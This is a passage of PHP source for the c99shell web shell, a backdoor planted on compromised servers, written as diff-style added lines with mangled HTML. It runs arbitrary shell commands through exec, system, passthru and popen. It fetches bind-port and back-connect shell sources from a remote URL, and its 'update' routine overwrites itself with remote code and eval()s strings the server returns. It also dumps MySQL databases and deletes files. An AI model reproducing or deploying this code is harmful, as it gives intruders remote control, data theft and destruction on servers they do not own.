fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return true; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return false;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + $ret = true; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = false;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return true; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif (is_file($d)) + { + if(copy($d,$t)) {return unlink($d);} + else {unlink($t); return false;} + } + else {return false;} +} +} +if (!function_exists("fs_rmdir")) +{ +function fs_rmdir($d) +{ + $h = opendir($d); + while (($o = readdir($h)) !== false) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.$o)) {unlink($d.$o);} + else {fs_rmdir($d.$o.DIRECTORY_SEPARATOR); rmdir($d.$o);} + } + } + closedir($h); + rmdir($d); + return !is_dir($d); +} +} +if (!function_exists("fs_rmobj")) +{ +function fs_rmobj($o) +{ + $o = str_replace("\\",DIRECTORY_SEPARATOR,$o); + if (is_dir($o)) + { + if (substr($o,-1) != DIRECTORY_SEPARATOR) {$o .= DIRECTORY_SEPARATOR;} + return fs_rmdir($o); + } + elseif (is_file($o)) {return unlink($o);} + else {return false;} +} +} +if (!function_exists("myshellexec")) +{ +function myshellexec($cmd) +{ + global $disablefunc; + $result = ""; + if (!empty($cmd)) + { + if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);} + elseif (($result = `$cmd`) !== false) {} + elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;} + elseif (is_resource($fp = popen($cmd,"r"))) + { + $result = ""; + while(!feof($fp)) {$result .= fread($fp,1024);} + pclose($fp); + } + } + return $result; +} +} +if (!function_exists("tabsort")) {function tabsort($a,$b) {global $v; return strnatcmp($a[$v], $b[$v]);}} +if (!function_exists("view_perms")) +{ +function view_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$type = "s";} + elseif (($mode & 0x4000) === 0x4000) {$type = "d";} + elseif (($mode & 0xA000) === 0xA000) {$type = "l";} + elseif (($mode & 0x8000) === 0x8000) {$type = "-";} + elseif (($mode & 0x6000) === 0x6000) {$type = "b";} + elseif (($mode & 0x2000) === 0x2000) {$type = "c";} + elseif (($mode & 0x1000) === 0x1000) {$type = "p";} + else {$type = "?";} + $owner["read"] = ($mode & 00400)?"r":"-"; + $owner["write"] = ($mode & 00200)?"w":"-"; + $owner["execute"] = ($mode & 00100)?"x":"-"; + $group["read"] = ($mode & 00040)?"r":"-"; + $group["write"] = ($mode & 00020)?"w":"-"; + $group["execute"] = ($mode & 00010)?"x":"-"; + $world["read"] = ($mode & 00004)?"r":"-"; + $world["write"] = ($mode & 00002)? "w":"-"; + $world["execute"] = ($mode & 00001)?"x":"-"; + if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";} + if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";} + if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";} + return $type.join("",$owner).join("",$group).join("",$world); +} +} +if (!function_exists("posix_getpwuid") and !in_array("posix_getpwuid",$disablefunc)) {function posix_getpwuid($uid) {return false;}} +if (!function_exists("posix_getgrgid") and !in_array("posix_getgrgid",$disablefunc)) {function posix_getgrgid($gid) {return false;}} +if (!function_exists("posix_kill") and !in_array("posix_kill",$disablefunc)) {function posix_kill($gid) {return false;}} +if (!function_exists("parse_perms")) +{ +function parse_perms($mode) +{ + if (($mode & 0xC000) === 0xC000) {$t = "s";} + elseif (($mode & 0x4000) === 0x4000) {$t = "d";} + elseif (($mode & 0xA000) === 0xA000) {$t = "l";} + elseif (($mode & 0x8000) === 0x8000) {$t = "-";} + elseif (($mode & 0x6000) === 0x6000) {$t = "b";} + elseif (($mode & 0x2000) === 0x2000) {$t = "c";} + elseif (($mode & 0x1000) === 0x1000) {$t = "p";} + else {$t = "?";} + $o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0; + $g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0; + $w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0; + return array("t"=>$t,"o"=>$o,"g"=>$g,"w"=>$w); +} +} +if (!function_exists("parsesort")) +{ +function parsesort($sort) +{ + $one = intval($sort); + $second = substr($sort,-1); + if ($second != "d") {$second = "a";} + return array($one,$second); +} +} +if (!function_exists("view_perms_color")) +{ +function view_perms_color($o) +{ + if (!is_readable($o)) {return "".view_perms(fileperms($o))."";} + elseif (!is_writable($o)) {return "".view_perms(fileperms($o))."";} + else {return "".view_perms(fileperms($o))."";} +} +} +if (!function_exists("c99getsource")) +{ +function c99getsource($fn) +{ + global $c99sh_sourcesurl; + $array = array( + "c99sh_bindport.pl" => "c99sh_bindport_pl.txt", + "c99sh_bindport.c" => "c99sh_bindport_c.txt", + "c99sh_backconn.pl" => "c99sh_backconn_pl.txt", + "c99sh_backconn.c" => "c99sh_backconn_c.txt", + "c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt", + "c99sh_datapipe.c" => "c99sh_datapipe_c.txt", + ); + $name = $array[$fn]; + if ($name) {return file_get_contents($c99sh_sourcesurl.$name);} + else {return false;} +} +} +if (!function_exists("c99sh_getupdate")) +{ +function c99sh_getupdate($update = true) +{ + $url = $GLOBALS["c99sh_updateurl"]."?version=".urlencode(base64_encode($GLOBALS["shver"]))."&updatenow=".($updatenow?"1":"0")."&"; + $data = @file_get_contents($url); + if (!$data) {return "Can't connect to update-server!";} + else + { + $data = ltrim($data); + $string = substr($data,3,ord($data{2})); + if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return false;} + if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";} + if ($data{0} == "\x99" and $data{1} == "\x03") + { + $string = explode("\x01",$string); + if ($update) + { + $confvars = array(); + $sourceurl = $string[0]; + $source = file_get_contents($sourceurl); + if (!$source) {return "Can't fetch update!";} + else + { + $fp = fopen(__FILE__,"w"); + if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually here.";} + else {fwrite($fp,$source); fclose($fp); return "Thanks! Updated with success.";} + } + } + else {return "New version are available: ".$string[1];} + } + elseif ($data{0} == "\x99" and $data{1} == "\x04") {eval($string); return 1;} + else {return "Error in protocol: segmentation failed! (".$data.") ";} + } +} +} +if (!function_exists("mysql_dump")) +{ +function mysql_dump($set) +{ + global $shver; + $sock = $set["sock"]; + $db = $set["db"]; + $print = $set["print"]; + $nl2br = $set["nl2br"]; + $file = $set["file"]; + $add_drop = $set["add_drop"]; + $tabs = $set["tabs"]; + $onlytabs = $set["onlytabs"]; + $ret = array(); + $ret["err"] = array(); + if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");} + if (empty($db)) {$db = "db";} + if (empty($print)) {$print = 0;} + if (empty($nl2br)) {$nl2br = 0;} + if (empty($add_drop)) {$add_drop = true;} + if (empty($file)) + { + $file = $tmpdir."dump_".getenv("SERVER_NAME")."_".$db."_".date("d-m-Y-H-i-s").".sql"; + } + if (!is_array($tabs)) {$tabs = array();} + if (empty($add_drop)) {$add_drop = true;} + if (sizeof($tabs) == 0) + { + // retrive tables-list + $res = mysql_query("SHOW TABLES FROM ".$db, $sock); + if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}} + } + $out = "# Dumped by C99Shell.SQL v. ".$shver." +# Home page: http://ccteam.ru +# +# Host settings: +# MySQL version: (".mysql_get_server_info().") running on ".getenv("SERVER_ADDR")." (".getenv("SERVER_NAME").")"." +# Date: ".date("d.m.Y H:i:s")." +# DB: \"".$db."\" +#--------------------------------------------------------- +"; + $c = count($onlytabs); + foreach($tabs as $tab) + { + if ((in_array($tab,$onlytabs)) or (!$c)) + { + if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";} + // recieve query for create table structure + $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock); + if (!$res) {$ret["err"][] = mysql_smarterror();} + else + { + $row = mysql_fetch_row($res); + $out .= $row["1"].";\n\n"; + // recieve table variables + $res = mysql_query("SELECT * FROM `$tab`", $sock); + if (mysql_num_rows($res) > 0) + { + while ($row = mysql_fetch_assoc($res)) + { + $keys = implode("`, `", array_keys($row)); + $values = array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = implode("', '", $values); + $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; + $out .= $sql; + } + } + } + } + } + $out .= "#---------------------------------------------------------------------------------\n\n"; + if ($file) + { + $fp = fopen($file, "w"); + if (!$fp) {$ret["err"][] = 2;} + else + { + fwrite ($fp, $out); + fclose ($fp); + } + } + if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}} + return $out; +} +} +if (!function_exists("mysql_buildwhere")) +{ +function mysql_buildwhere($array,$sep=" and",$functs=array()) +{ + if (!is_array($array)) {$array = array();} + $result = ""; + foreach($array as $k=>$v) + { + $value = ""; + if (!empty($functs[$k])) {$value .= $functs[$k]."(";} + $value .= "'".addslashes($v)."'"; + if (!empty($functs[$k])) {$value .= ")";} + $result .= "`".$k."` = ".$value.$sep; + } + $result = substr($result,0,strlen($result)-strlen($sep)); + return $result; +} +} +if (!function_exists("mysql_fetch_all")) +{ +function mysql_fetch_all($query,$sock) +{ + if ($sock) {$result = mysql_query($query,$sock);} + else {$result = mysql_query($query);} + $array = array(); + while ($row = mysql_fetch_array($result)) {$array[] = $row;} + mysql_free_result($result); + return $array; +} +} +if (!function_exists("mysql_smarterror")) +{ +function mysql_smarterror($type,$sock) +{ + if ($sock) {$error = mysql_error($sock);} + else {$error = mysql_error();} + $error = htmlspecialchars($error); + return $error; +} +} +if (!function_exists("mysql_query_form")) +{ +function mysql_query_form() +{ + global $submit,$sql_act,$sql_query,$sql_query_result,$sql_confirm,$sql_query_error,$tbl_struct; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) + { + echo ""; + if ($tbl_struct) + { + echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to";} else {echo "SQL-Query";} echo ":



     
    Fields:
    "; + foreach ($tbl_struct as $field) {$name = $field["Field"]; echo "+ ".$name."
    ";} + echo "
    "; + } + } + if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;} +} +} +if (!function_exists("mysql_create_db")) +{ +function mysql_create_db($db,$sock="") +{ + $sql = "CREATE DATABASE `".addslashes($db)."`;"; + if ($sock) {return mysql_query($sql,$sock);} + else {return mysql_query($sql);} +} +} +if (!function_exists("mysql_query_parse")) +{ +function mysql_query_parse($query) +{ + $query = trim($query); + $arr = explode (" ",$query); + /*array array() + { + "METHOD"=>array(output_type), + "METHOD1"... + ... + } + if output_type == 0, no output, + if output_type == 1, no output if no error + if output_type == 2, output without control-buttons + if output_type == 3, output with control-buttons + */ + $types = array( + "SELECT"=>array(3,1), + "SHOW"=>array(2,1), + "DELETE"=>array(1), + "DROP"=>array(1) + ); + $result = array(); + $op = strtoupper($arr[0]); + if (is_array($types[$op])) + { + $result["propertions"] = $types[$op]; + $result["query"] = $query; + if ($types[$op] == 2) + { + foreach($arr as $k=>$v) + { + if (strtoupper($v) == "LIMIT") + { + $result["limit"] = $arr[$k+1]; + $result["limit"] = explode(",",$result["limit"]); + if (count($result["limit"]) == 1) {$result["limit"] = array(0,$result["limit"][0]);} + unset($arr[$k],$arr[$k+1]); + } + } + } + } + else {return false;} +} +} +if (!function_exists("c99fsearch")) +{ +function c99fsearch($d) +{ + global $found; + global $found_d; + global $found_f; + global $search_i_f; + global $search_i_d; + global $a; + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($f = readdir($h)) !== false) + { + if($f != "." && $f != "..") + { + $bool = (empty($a["name_regexp"]) and strpos($f,$a["name"]) !== false) || ($a["name_regexp"] and ereg($a["name"],$f)); + if (is_dir($d.$f)) + { + $search_i_d++; + if (empty($a["text"]) and $bool) {$found[] = $d.$f; $found_d++;} + if (!is_link($d.$f)) {c99fsearch($d.$f);} + } + else + { + $search_i_f++; + if ($bool) + { + if (!empty($a["text"])) + { + $r = @file_get_contents($d.$f); + if ($a["text_wwo"]) {$a["text"] = " ".trim($a["text"])." ";} + if (!$a["text_cs"]) {$a["text"] = strtolower($a["text"]); $r = strtolower($r);} + if ($a["text_regexp"]) {$bool = ereg($a["text"],$r);} + else {$bool = strpos(" ".$r,$a["text"],1);} + if ($a["text_not"]) {$bool = !$bool;} + if ($bool) {$found[] = $d.$f; $found_f++;} + } + else {$found[] = $d.$f; $found_f++;} + } + } + } + } + closedir($h); +} +} +if ($act == "gofile") {if (is_dir($f)) {$act = "ls"; $d = $f;} else {$act = "f"; $d = dirname($f); $f = basename($f);}} +//Sending headers +@ob_start(); +@ob_implicit_flush(0); +function onphpshutdown() +{ + global $gzipencode,$ft; + if (!headers_sent() and $gzipencode and !in_array($ft,array("img","download","notepad"))) + { + $v = @ob_get_contents(); + @ob_end_clean(); + @ob_start("ob_gzHandler"); + echo $v; + @ob_end_flush(); + } +} +function c99shexit() +{ + onphpshutdown(); + exit; +} +header("Expires: Mon, 26 Jul 1997 05:00:00 GMT"); +header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT"); +header("Cache-Control: no-store, no-cache, must-revalidate"); +header("Cache-Control: post-check=0, pre-check=0", false); +header("Pragma: no-cache"); +if (empty($tmpdir)) +{ + $tmpdir = ini_get("upload_tmp_dir"); + if (is_dir($tmpdir)) {$tmpdir = "/tmp/";} +} +$tmpdir = realpath($tmpdir); +$tmpdir = str_replace("\\",DIRECTORY_SEPARATOR,$tmpdir); +if (substr($tmpdir,-1) != DIRECTORY_SEPARATOR) {$tmpdir .= DIRECTORY_SEPARATOR;} +if (empty($tmpdir_logs)) {$tmpdir_logs = $tmpdir;} +else {$tmpdir_logs = realpath($tmpdir_logs);} +if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on") +{ + $safemode = true; + $hsafemode = "ON (secure)"; +} +else {$safemode = false; $hsafemode = "OFF (not secure)";} +$v = @ini_get("open_basedir"); +if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "".$v."";} +else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";} +$sort = htmlspecialchars($sort); +if (empty($sort)) {$sort = $sort_default;} +$sort[1] = strtolower($sort[1]); +$DISP_SERVER_SOFTWARE = getenv("SERVER_SOFTWARE"); +if (!ereg("PHP/".phpversion(),$DISP_SERVER_SOFTWARE)) {$DISP_SERVER_SOFTWARE .= ". PHP/".phpversion();} +$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",htmlspecialchars($DISP_SERVER_SOFTWARE)); +@ini_set("highlight.bg",$highlight_bg); //FFFFFF +@ini_set("highlight.comment",$highlight_comment); //#FF8000 +@ini_set("highlight.default",$highlight_default); //#0000BB +@ini_set("highlight.html",$highlight_html); //#000000 +@ini_set("highlight.keyword",$highlight_keyword); //#007700 +@ini_set("highlight.string",$highlight_string); //#DD0000 +if (!is_array($actbox)) {$actbox = array();} +$dspact = $act = htmlspecialchars($act); +$disp_fullpath = $ls_arr = $notls = null; +$ud = urlencode($d); +?> + + +<?php echo getenv("HTTP_HOST"); ?> - [I-_-I] -c99shell + + +

    + --{ C99Shell by [I-_-I] }-- (BrainScan)

    Software :  

    uname -a : ",1); ?> 

    ",1);} else {echo get_current_user();} ?> 

    Safe-mode : 

    ".htmlspecialchars($b).DIRECTORY_SEPARATOR.""; + $i++; +} +echo "   "; +if (is_writable($d)) +{ + $wd = true; + $wdt = "[ ok ]"; + echo "".view_perms(fileperms($d)).""; +} +else +{ + $wd = false; + $wdt = "[ Read-Only ]"; + echo "".view_perms_color($d).""; +} +if (is_callable("disk_free_space")) +{ + $free = disk_free_space($d); + $total = disk_total_space($d); + if ($free === false) {$free = 0;} + if ($total === false) {$total = 0;} + if ($free < 0) {$free = 0;} + if ($total < 0) {$total = 0;} + $used = $total-$free; + $free_percent = round(100/($total/$free),2); + echo "
    Free ".view_size($free)." of ".view_size($total)." (".$free_percent."%)
    "; +} +echo "
    "; +$letters = ""; +if ($win) +{ + $v = explode("\\",$d); + $v = $v[0]; + foreach (range("a","z") as $letter) + { + $bool = $isdiskette = in_array($letter,$safemode_diskettes); + if (!$bool) {$bool = is_dir($letter.":\\");} + if ($bool) + { + $letters .= "[ "; + if ($letter.":" != $v) {$letters .= $letter;} + else {$letters .= "".$letter."";} + $letters .= " ] "; + } + } + if (!empty($letters)) {echo "Detected drives: ".$letters."
    ";} +} +if (count($quicklaunch) > 0) +{ + foreach($quicklaunch as $item) + { + $item[1] = str_replace("%d",urlencode($d),$item[1]); + $item[1] = str_replace("%sort",$sort,$item[1]); + $v = realpath($d.".."); + if (empty($v)) {$a = explode(DIRECTORY_SEPARATOR,$d); unset($a[count($a)-2]); $v = join(DIRECTORY_SEPARATOR,$a);} + $item[1] = str_replace("%upd",urlencode($v),$item[1]); + echo "".$item[0]."    "; + } +} +echo "


    "; +if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo "
    ".$donated_html."

    ";} +echo ""; + $line = explode(" ",$line); + $line[10] = join(" ",array_slice($line,10)); + $line = array_slice($line,0,11); + if ($line[0] == get_current_user()) {$line[0] = "".$line[0]."";} + $line[] = "KILL"; + $prcs[] = $line; + echo ""; + } + } + } + else + { + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $ret = convert_cyr_string($ret,"d","w"); + $stack = explode("\n",$ret); + unset($stack[0],$stack[2]); + $stack = array_values($stack); + $head = explode(" ",$stack[0]); + $head[1] = explode(" ",$head[1]); + $head[1] = $head[1][0]; + $stack = array_slice($stack,1); + unset($head[2]); + $head = array_values($head); + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + if ($k > count($head)) {$k = count($head)-1;} + for($i=0;$i".trim($head[$i])."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo ""; + $line = explode(" ",$line); + $line[1] = intval($line[1]); $line[2] = $line[3]; unset($line[3]); + $line[2] = intval(str_replace(" ","",$line[2]))*1024; + $prcs[] = $line; + echo ""; + } + } + } + $head[$k] = "".$head[$k]."".$y; + $v = $processes_sort[0]; + usort($prcs,"tabsort"); + if ($processes_sort[1] == "d") {$prcs = array_reverse($prcs);} + $tab = array(); + $tab[] = $head; + $tab = array_merge($tab,$prcs); + echo "
    "; +if ($act == "") {$act = $dspact = "ls";} +if ($act == "sql") +{ + $sql_surl = $surl."act=sql"; + if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);} + if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);} + if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);} + if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);} + if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);} + $sql_surl .= "&"; + ?>

    Attention! SQL-Manager is NOT ready module! Don't reports bugs.

    "; + if (!$sql_sock) {?>"; + } + echo "
    SQL Manager:
    "; + if (!$sql_sock) + { + if (!$sql_server) {echo "NO CONNECTION";} + else {echo "
    Can't connect
    "; echo "".$err."";} + } + else + { + $sqlquicklaunch = array(); + $sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&"); + $sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)); + $sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus"); + $sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars"); + $sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes"); + $sqlquicklaunch[] = array("Logout",$surl."act=sql"); + echo "
    MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
    "; + if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + } + echo "
    i
  • If login is null, login is owner of process.
  • If host is null, host is localhost
  • If port is null, port is 3306 (default)
  •  Please, fill the form:
    UsernamePassword Database 
    HostPORT
    ">Home
    ".htmlspecialchars($sql_db)." ]---
    "; + $c = 0; + while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM ".$row[0]); $count_row = mysql_fetch_array($count); echo "".htmlspecialchars($row[0])." (".$count_row[0].")
    "; mysql_free_result($count); $c++;} + if (!$c) {echo "No tables found in database.";} + } + } + else + { + ?>
    Home

    Please, select database
    "; + //Start center panel + $diplay = true; + if ($sql_db) + { + if (!is_numeric($c)) {$c = 0;} + if ($c == 0) {$c = "no";} + echo "
    There are ".$c." table(s) in this DB (".htmlspecialchars($sql_db).").
    "; + if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}} + echo "
    "; + $acts = array("","dump"); + if ($sql_act == "tbldrop") {$sql_query = "DROP TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblempty") {$sql_query = ""; foreach($boxtbl as $v) {$sql_query .= "DELETE FROM `".$v."` \n";} $sql_act = "query";} + elseif ($sql_act == "tbldump") {if (count($boxtbl) > 0) {$dmptbls = $boxtbl;} elseif($thistbl) {$dmptbls = array($sql_tbl);} $sql_act = "dump";} + elseif ($sql_act == "tblcheck") {$sql_query = "CHECK TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tbloptimize") {$sql_query = "OPTIMIZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblrepair") {$sql_query = "REPAIR TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "tblanalyze") {$sql_query = "ANALYZE TABLE"; foreach($boxtbl as $v) {$sql_query .= "\n`".$v."` ,";} $sql_query = substr($sql_query,0,-1).";"; $sql_act = "query";} + elseif ($sql_act == "deleterow") {$sql_query = ""; if (!empty($boxrow_all)) {$sql_query = "DELETE * FROM `".$sql_tbl."`;";} else {foreach($boxrow as $v) {$sql_query .= "DELETE * FROM `".$sql_tbl."` WHERE".$v." LIMIT 1;\n";} $sql_query = substr($sql_query,0,-1);} $sql_act = "query";} + elseif ($sql_tbl_act == "insert") + { + if ($sql_tbl_insert_radio == 1) + { + $keys = ""; + $akeys = array_keys($sql_tbl_insert); + foreach ($akeys as $v) {$keys .= "`".addslashes($v)."`, ";} + if (!empty($keys)) {$keys = substr($keys,0,strlen($keys)-2);} + $values = ""; + $i = 0; + foreach (array_values($sql_tbl_insert) as $v) {if ($funct = $sql_tbl_insert_functs[$akeys[$i]]) {$values .= $funct." (";} $values .= "'".addslashes($v)."'"; if ($funct) {$values .= ")";} $values .= ", "; $i++;} + if (!empty($values)) {$values = substr($values,0,strlen($values)-2);} + $sql_query = "INSERT INTO `".$sql_tbl."` ( ".$keys." ) VALUES ( ".$values." );"; + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + elseif ($sql_tbl_insert_radio == 2) + { + $set = mysql_buildwhere($sql_tbl_insert,", ",$sql_tbl_insert_functs); + $sql_query = "UPDATE `".$sql_tbl."` SET ".$set." WHERE ".$sql_tbl_insert_q." LIMIT 1;"; + $result = mysql_query($sql_query) or print(mysql_smarterror()); + $result = mysql_fetch_array($result, MYSQL_ASSOC); + $sql_act = "query"; + $sql_tbl_act = "browse"; + } + } + if ($sql_act == "query") + { + echo "
    "; + if (($submit) and (!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
    ".$sql_query_error."
    ";} + if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;} + if ((!$submit) or ($sql_act)) {echo "
    "; if (($sql_query) and (!$submit)) {echo "Do you really want to:";} else {echo "SQL-Query :";} echo "



     
    ";} + } + if (in_array($sql_act,$acts)) + { + ?>
    Create new table:
     
    Dump DB:
    "> 
    ";} + if ($sql_act == "newtbl") + { + echo ""; + if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
    "; + } + else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
    Reason: ".mysql_smarterror();} + } + elseif ($sql_act == "dump") + { + if (empty($submit)) + { + $diplay = false; + echo "
    SQL-Dump:

    "; + echo "DB: 

    "; + $v = join (";",$dmptbls); + echo "Only tables (explode \";\") 1: 

    "; + if ($dump_file) {$tmp = $dump_file;} + else {$tmp = htmlspecialchars("./dump_".getenv("SERVER_NAME")."_".$sql_db."_".date("d-m-Y-H-i-s").".sql");} + echo "File: 

    "; + echo "Download:  

    "; + echo "Save to file:  "; + echo "



    1 - all, if empty"; + echo "
